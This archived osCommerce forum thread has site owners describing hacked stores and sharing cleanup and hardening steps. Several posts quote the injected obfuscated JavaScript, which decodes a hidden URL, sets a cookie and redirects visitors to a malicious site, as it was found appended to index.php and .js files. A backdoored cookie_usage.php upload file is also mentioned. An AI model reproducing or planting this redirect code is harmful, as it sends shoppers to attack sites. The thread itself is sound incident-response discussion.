Jump to content
dev osCommerce
Forum
  • Checkout
  • Login
  • Contact Us
  • Get in touch

osCommerce

The e-commerce.

New Demo
Our Partners

OS Commercer R2.2. Hacked

crazeuk

By crazeuk
in Security

Recommended Posts

crazeuk

crazeuk

Posted
Posted

Hi Guys.

I am quite new to OSCommerce.

I used it for my site which has been live since October 2010.

 

The site was fine until yesterday, when i got a call saying my site was down.

 

In my limited knowlegde of php.. the only chnages i noticed are:

the index.php files had

1. the end of the php block removed " 

?>

"

2. the following section was changed:

From:

</body>
</html>
<?php require(DIR_WS_INCLUDES . 'application_bottom.php'); ?>

To:

</body>
</html>
<?php require(DIR_WS_INCLUDES . 'application_bottom.php');  <script language="JavaScript">if(document.cookie.indexOf("udbs=1")<0){var j=0,n="";while(j<44)n+=String.fromCharCode("iuuq;0086/238/219/2850byb0dd0pvu/qiq@t`je>2".charCodeAt(j++)-1);document.cookie="udbs=1;";document.location=n;}</script> ?><script language="JavaScript">if(document.cookie.indexOf("udbs=1")<0){var j=0,n="";while(j<44)n+=String.fromCharCode("iuuq;0086/238/219/2850byb0dd0pvu/qiq@t`je>2".charCodeAt(j++)-1);document.cookie="udbs=1;";document.location=n;}</script>

 

Can anyone help with this before it gets hacked again.

 

Thanks in advance.

Link to comment
Share on other sites
Guest

Guest

Posted
Posted

Follow these steps to clean and secure your website:

 

1) Lock down your site by using an .htaccess password so your customers are not attacked by the hackers code.

 

2) FTP all of the files to your local machine and use a program like WinGrep to identify and remove all malicious and anomalous files containing hacker code.

 

3) Delete the files on your hosting account before uploading the clean files.

 

4) FTP the clean files back to your hosting account and read and implement the security patches and contributions found in these two threads. Admin Security and Website Security.

 

5) Change all of your passwords: FTP, CPANEL, STORE ADMIN and DATABASE

 

6) Make sure File and Directory Permissions are set correctly. Directories no higher than 755, Files no higher than 644 and the TWO configure.php files no higher than 444

 

7) If your site has been 'black listed' as an attack site by Google, then log into Google Webmaster Tools and submit the site to be re-indexed and verified to be removed from the 'black list'

 

8) Remove the .htaccess password protection so your customers can resume making purchases from your website.

 

9) Monitor your website using the newly installed contributions to prevent future hacker attacks.

 

10) If you feel you can not perform any of the above steps, ask for help, because if you miss any of these steps your site may remain accessible to the hacker.

 

 

 

Chris

Link to comment
Share on other sites
crazeuk

crazeuk

Posted
  • Author
Posted

Wow fast response!

 

Thanks for all these tips.

 

I am going to sit down in the next hour or so and make a crack at this.

I did take some basic steps a few weeks ago when the host blocked my account for spam emails.

 

1. .htpassword protected the admin folder

2. renamed the admin folder

3. i no longer use the contact forms from oscommerce, and use my own outside of the installation (should i delete these).

 

Thanks again.. MUCH appreciated!

 

 

Follow these steps to clean and secure your website:

 

1) Lock down your site by using an .htaccess password so your customers are not attacked by the hackers code.

 

2) FTP all of the files to your local machine and use a program like WinGrep to identify and remove all malicious and anomalous files containing hacker code.

 

3) Delete the files on your hosting account before uploading the clean files.

 

4) FTP the clean files back to your hosting account and read and implement the security patches and contributions found in these two threads. Admin Security and Website Security.

 

5) Change all of your passwords: FTP, CPANEL, STORE ADMIN and DATABASE

 

6) Make sure File and Directory Permissions are set correctly. Directories no higher than 755, Files no higher than 644 and the TWO configure.php files no higher than 444

 

7) If your site has been 'black listed' as an attack site by Google, then log into Google Webmaster Tools and submit the site to be re-indexed and verified to be removed from the 'black list'

 

8) Remove the .htaccess password protection so your customers can resume making purchases from your website.

 

9) Monitor your website using the newly installed contributions to prevent future hacker attacks.

 

10) If you feel you can not perform any of the above steps, ask for help, because if you miss any of these steps your site may remain accessible to the hacker.

 

 

 

Chris

Link to comment
Share on other sites
geoffreywalton

♥geoffreywalton

Posted
Posted

If you want some more info on step 2, ping me a PM and I'll send over a guide.

 

Cheers

 

G

Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile

 

Virus Threat Scanner

My Contributions

Basic install answers.

Click here for Contributions / Add Ons.

UK your site.

Site Move.

Basic design info.

 

For links mentioned in old answers that are no longer here follow this link Useful Threads.

 

If this post was useful, click the Like This button over there ======>>>>>.

Link to comment
Share on other sites
Guest

Guest

Posted
Posted

HI,

 

same thing with me. One, very important question: How DO I implement an .htaccess password? I work with FileZilla

and couldn't find a way. Sorry if it's a stupid question, Newbie to all this.

 

Thanks

 

usfanshop

Link to comment
Share on other sites
Guest

Guest

Posted
Posted

Dominique,

 

You can use your hosting account file manager to password protect your site while your cleaning it -OR- You can create an htaccess file and an associated htccess_pswrd file.

 

 

 

Chris

Link to comment
Share on other sites
Guest

Guest

Posted
Posted

Hi All,

 

I got this problem on Friday and it's repeatedly hit my site ever since. I'm going to list what I've found and done so far so hopefully it will help someone else or someone can tell me that I'm being an idiot - I don't mind either way :-)

 

What this thing does

On my site it seems to write the following line of code at the end of all my .js files and all my index.php files

 

if(document.cookie.indexOf("w3c=21")<0){var j=0,n="";while(j<24)n+=String.fromCharCode("iuuq;00:5/74/355/680x4d0".charCodeAt(j++)-1);document.cookie="w3c=21;";document.location=n;}

 

This seems to then redirect my home page to some dodgy sites that are blocked by google. If I remove the link to jquery.js and all other .js files in my home page, I then get my site back but there is still some attempt to link to a dodgy site. By then going in to each index.php file and removing the code I get my site back without further issue

 

1. First of all I followed all the advise already posted to this topic (why woudn't you).

2. I have applied .ht access file to all folders to restrict ability to read the contents (at least I think I have)

3. I've stopped using a local jquery.js and now use the google hosted version and moved the other .js files into the <head> of my index file

4. I've also set permissions on my index files to CHMOD444

5. Switched off FTP (not even I can use it now)

 

Having added IP v5.1 and Security Pro 2 I really hope I've stopped this happening but I can't be sure the code that causes all this in the first place isn't tucked away in a file somewhere, so If anyone finds it I'd really like to know where it is.

 

I love oscommerce and I love the support everyone provides; I hope this helps and if there are any flaws in my actions it would be great if someone could let me know.

 

Thanks all

Link to comment
Share on other sites
ivo_joe

ivo_joe

Posted
Posted

Part solution to the problem.

 

Our site was hit with the same thing over the weekend. Our OSC site is getting hacked every two months now. We believe our site was originally compromised months ago by a hacker using the OSC file_manager.php program. We have since secured this file (google it). What we didn't know was that file_manager.php was used to upload a fake cookie_usage.php file that enabled them to to upload and change OSC files.

 

Secure the file file_manager.php.

Check for a fake cookie_usage.php file. It should not have code in it referencing file upload functions.

 

Remember before open-source, when hackers had to use the time consuming method of 'trial and error' to find the security holes. Now they just read the open-source code to find the holes. Sorry, but I am losing faith in the idea that open-source leads to higher security over closed-source solutions.

Link to comment
Share on other sites
Xpajun

Xpajun

Posted
Posted

 

Secure the file file_manager.php.

 

 

 

 

NO delete the file_manager.php - it is the most totally useless bit of php coding ever written - unless you're a hacker of course

My store is currently running Phoenix 1.0.3.0

I'm currently working on 1.0.7.2 and hope to get it live before 1.0.8.0 arrives (maybe 🙄 )

I used to have a list of add-ons here but I've found that with the ones that supporters of Phoenix get any other add-ons are not really neccessary

Link to comment
Share on other sites
Guest

Guest

Posted
Posted

Hi All,

 

I got this problem on Friday and it's repeatedly hit my site ever since. I'm going to list what I've found and done so far so hopefully it will help someone else or someone can tell me that I'm being an idiot - I don't mind either way :-)

 

What this thing does

On my site it seems to write the following line of code at the end of all my .js files and all my index.php files

 

if(document.cookie.indexOf("w3c=21")<0){var j=0,n="";while(j<24)n+=String.fromCharCode("iuuq;00:5/74/355/680x4d0".charCodeAt(j++)-1);document.cookie="w3c=21;";document.location=n;}

 

This seems to then redirect my home page to some dodgy sites that are blocked by google. If I remove the link to jquery.js and all other .js files in my home page, I then get my site back but there is still some attempt to link to a dodgy site. By then going in to each index.php file and removing the code I get my site back without further issue

 

1. First of all I followed all the advise already posted to this topic (why woudn't you).

2. I have applied .ht access file to all folders to restrict ability to read the contents (at least I think I have)

3. I've stopped using a local jquery.js and now use the google hosted version and moved the other .js files into the <head> of my index file

4. I've also set permissions on my index files to CHMOD444

5. Switched off FTP (not even I can use it now)

 

Having added IP v5.1 and Security Pro 2 I really hope I've stopped this happening but I can't be sure the code that causes all this in the first place isn't tucked away in a file somewhere, so If anyone finds it I'd really like to know where it is.

 

I love oscommerce and I love the support everyone provides; I hope this helps and if there are any flaws in my actions it would be great if someone could let me know.

 

Thanks all

 

Found lots of nasties in cookie_usage.php, as suggest in the post above. I strongly recommend all to check this file against an original oscommerce file.

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

Go to topic listing
×
×
  • Create New...